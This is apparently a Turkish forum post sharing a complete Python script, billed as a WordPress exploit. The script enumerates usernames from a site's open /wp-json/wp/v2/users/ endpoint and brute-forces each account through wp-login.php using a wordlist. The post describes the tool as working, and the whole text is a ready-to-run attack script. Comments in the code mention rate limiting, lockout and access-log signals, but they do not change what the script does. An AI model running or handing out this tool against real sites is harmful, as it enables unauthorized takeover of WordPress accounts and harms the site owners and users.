WordPress'ten kullanıcı adlarını enumerate eder ve doğrudan brute-force yapmaya çalışır; gayet de çalışıyor.
Python:
#!/usr/bin/env python3
import os
import subprocess
import requests
import json
# Directory, relative to the working directory, that receives the per-site
# username files written by create_log().
output_dir = "log"
# Browser-like User-Agent attached to every request the script sends. It never
# varies between requests, so it is a stable string to match in access logs.
user_agent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0"
# Path of the password list. It is asked for interactively while the module is
# loading, i.e. before the command-line arguments are checked.
wordlist_file = input("Wordlist: ")
def banner():
    """Clear the terminal and print the tool's title line."""
    title = """ ##KarsikaX WP Exploit## """
    # Shells out to the `clear` command; the command string is a constant.
    os.system("clear")
    print(title)
def create_log(url, user_list):
    """Store the collected usernames in ``<output_dir>/<host>``, one per line.

    Args:
        url: Target URL. The host is the text between ``//`` and the next
            ``/``, so the URL has to contain ``//``.
        user_list: Username strings to write.
    """
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)
    host = url.split('//')[1].split('/')[0]
    # Dots become underscores, so the file name is the host with no extension.
    log_path = os.path.join(output_dir, host.replace('.', '_'))
    # Mode 'w' truncates: a second run against the same host replaces the file.
    with open(log_path, 'w') as log_file:
        log_file.writelines(f"{name}\n" for name in user_list)
    print(f"[+] All found usernames are stored in {log_path}")
def bruteforce(target, username, password_list):
    """Submit every password in *password_list* for *username* to wp-login.php.

    Seen from the server this is one POST to ``/wp-login.php`` per candidate,
    sent back to back with the same User-Agent and no pause in between. That
    is the pattern login rate limiting, account lockout and a second factor
    are meant to stop, and it stands out in access logs.

    Args:
        target: Site base URL; ``/wp-login.php`` is appended to it.
        username: Value sent in the ``log`` form field.
        password_list: Iterable of values sent in the ``pwd`` form field.

    Returns:
        True as soon as one attempt is judged successful, False once the list
        is exhausted.
    """
    login_url = f"{target}/wp-login.php"
    for candidate in password_list:
        form = {"log": username, "pwd": candidate, "wp-submit": "Log In"}
        reply = requests.post(
            login_url, data=form, headers={"User-Agent": user_agent}
        )
        # The only success signal is the URL of the final response (after any
        # redirects requests followed) containing "wp-admin".
        if "wp-admin" not in reply.url:
            continue
        print(f"[+] Successful login: {username} : {candidate}")
        return True
    print(f"[-] Brute-force unsuccessful for username: {username}")
    return False
def read_wordlist(wordlist_file):
    """Return the lines of *wordlist_file* with surrounding whitespace removed.

    Blank lines are kept and come back as empty strings. The file is opened in
    text mode with the platform's default encoding.
    """
    entries = []
    with open(wordlist_file, 'r') as handle:
        for raw_line in handle:
            entries.append(raw_line.strip())
    return entries
def enum_from_json(target):
    """Read usernames from the WordPress REST API, then try the wordlist on each.

    The request goes to ``/wp-json/wp/v2/users/`` without credentials. A site
    that leaves this route open to anonymous requests hands out the ``slug``
    of each listed user; requiring authentication for the route removes that
    source, and login throttling plus a second factor limit what a known
    username is worth.

    Args:
        target: Site base URL.
    """
    endpoint = f"{target}/wp-json/wp/v2/users/"
    reply = requests.get(endpoint, headers={"User-Agent": user_agent})
    # Any status other than 200 ends the run for this target.
    if reply.status_code != 200:
        print("[-] Unable to find user from JSON")
        return
    # The body is parsed as JSON and every entry is expected to carry "slug".
    user_list = [entry["slug"] for entry in reply.json()]
    print(f"[+] Found {len(user_list)} usernames in /wp-json")
    create_log(target, user_list)
    # The wordlist is read once and reused for every username.
    candidates = read_wordlist(wordlist_file)
    for username in user_list:
        bruteforce(target, username, candidates)
def main(target):
    """Check the URL scheme, then run the enumeration and guessing pass.

    Args:
        target: Site base URL; must start with ``http://`` or ``https://``
            (compared case-insensitively), otherwise the process exits with
            status 1.
    """
    has_scheme = target.lower().startswith(("http://", "https://"))
    if not has_scheme:
        print("[-] Your given URL seems to be invalid.")
        exit(1)
    print(f"[+] Start scanning {target}")
    enum_from_json(target)
    print("[+] Finished scanning.")
if __name__ == "__main__":
    import sys

    banner()
    # Exactly one argument, the target URL, is accepted; anything else prints
    # the usage line and exits with status 0.
    argv = sys.argv
    if len(argv) != 2:
        print("[+] Usage: {} <url>".format(argv[0]))
        exit(0)
    main(argv[1])